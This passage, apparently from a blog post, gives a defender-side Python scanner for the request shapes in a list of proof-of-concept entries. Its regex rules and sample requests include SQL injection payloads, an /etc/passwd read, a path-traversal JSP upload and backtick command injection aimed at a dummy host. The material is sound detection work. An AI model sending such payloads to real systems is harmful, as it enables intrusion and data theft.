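The PoCs in entries 185 to 203 reuse a small number of request shapes: time-based or UNION SQL injection in a query or form parameter, SELECT ... INTO OUTFILE, a parameter that reads /etc/passwd, a multipart filename carrying ../ or a script extension, and command injection through os.system(), backticks or a ; separator. Since the list is meant for defenders doing risk triage, the following Python sketch is a detection-side companion, added here and not code from the original article or any of the listed products. It URL-decodes a raw request and reports which shapes match; the rule labels, the scan_request() helper and the sample requests are all constructed for illustration. The patterns are kept generic, so they cover request shapes beyond the specific entries above.

```python
"""Defender-side triage of the request shapes catalogued in entries 185 to 203.

Added example for this post (not code from the original article or from any of
the listed products). The rule labels, scan_request() and the sample requests
below are constructed for illustration only.
"""
import re
from urllib.parse import unquote_plus

# Generic shapes taken from the PoCs above: time-based and UNION SQL injection,
# SELECT ... INTO OUTFILE, /etc/passwd reads, traversal or script extensions in
# multipart filenames, and command injection via os.system(), backticks or ';'.
RULES = [
    ("sqli-time-mssql", re.compile(r"waitfor\s+delay", re.I)),
    ("sqli-time-mysql", re.compile(r"\bsleep\s*\(", re.I)),
    ("sqli-heavy-sqlite", re.compile(r"randomblob\s*\(", re.I)),
    ("sqli-union", re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)),
    ("sqli-into-outfile", re.compile(r"\binto\s+outfile\b", re.I)),
    ("lfi-etc-passwd", re.compile(r"/etc/passwd", re.I)),
    ("upload-traversal", re.compile(r'filename="[^"]*\.\./', re.I)),
    ("upload-script-ext", re.compile(r'filename="[^"]*\.(?:jsp|php|ashx|aspx)"', re.I)),
    ("cmdi-python-os-system", re.compile(r"os\.system\s*\(", re.I)),
    ("cmdi-backtick", re.compile(r"`[^`\n]{1,200}`")),
    # A shell separator, a command word, then whitespace, a quote or another
    # separator; the lookahead keeps ordinary "&id=..." parameters quiet.
    ("cmdi-shell-separator",
     re.compile(r"[;|&`]\s*(?:uname|id|whoami|cat|ls|echo)(?=\s|[;&|`'\"]|$)", re.I)),
]


def decode(text: str, rounds: int = 2) -> str:
    """URL-decode up to `rounds` times so %27, %20, '+' and double-encoded
    payloads all collapse to the characters the rules look for."""
    for _ in range(rounds):
        new = unquote_plus(text)
        if new == text:
            break
        text = new
    return text


def scan_request(raw: str) -> list[str]:
    """Return the sorted rule labels matching a raw HTTP request (request line,
    headers and body). Both the raw and the decoded text are checked, because
    multipart bodies are not URL-encoded while query strings usually are."""
    hits = set()
    for view in (raw, decode(raw)):
        for label, pattern in RULES:
            if pattern.search(view):
                hits.add(label)
    return sorted(hits)


# Constructed sample traffic, modelled on the shapes above against a dummy host.
SAMPLE_REQUESTS = {
    "clinical-viewer-delete": (
        "GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1\r\n"
        "Host: example.internal\r\n\r\n"),
    "attachment-read": (
        "GET /attachment?file=/etc/passwd HTTP/1.1\r\nHost: example.internal\r\n\r\n"),
    "fe-upload": (
        "POST /servlet/uploadAttachmentServlet HTTP/1.1\r\nHost: example.internal\r\n"
        "Content-Type: multipart/form-data; boundary=----X\r\n\r\n"
        "------X\r\n"
        'Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"\r\n'
        "Content-Type: text/plain\r\n\r\n<% out.println(\"hello\");%>\r\n------X--\r\n"),
    "luci-query": (
        "GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60ls%20%2Ftmp%60 HTTP/1.1\r\n"
        "Host: example.internal\r\n\r\n"),
    "seacms-dmku": (
        "GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1\r\n"
        "Host: example.internal\r\n\r\n"),
    # Benign request: the word "sleep" without "(" must not trigger anything.
    "benign-search": (
        "GET /search?q=sleep+apnea+clinic HTTP/1.1\r\nHost: example.internal\r\n\r\n"),
}


def scan_samples() -> dict[str, list[str]]:
    """Run every sample through scan_request() and return {name: labels}."""
    return {name: scan_request(req) for name, req in SAMPLE_REQUESTS.items()}


if __name__ == "__main__":
    for name, labels in scan_samples().items():
        print(f"{name:24s} {labels or 'clean'}")
```

Two points from the samples carry over to real deployments: match after URL decoding (the catalogued PoCs arrive with %27, %20 and + encoding, and the "clinical-viewer-delete" sample only matches once decoded), and check multipart bodies in their raw form, since a filename with ../ or a .jsp/.php/.ashx extension is the strongest signal for the upload entries. Time-based SQL injection leaves nothing in the response body, so pair these request-side rules with response-latency monitoring on the affected endpoints.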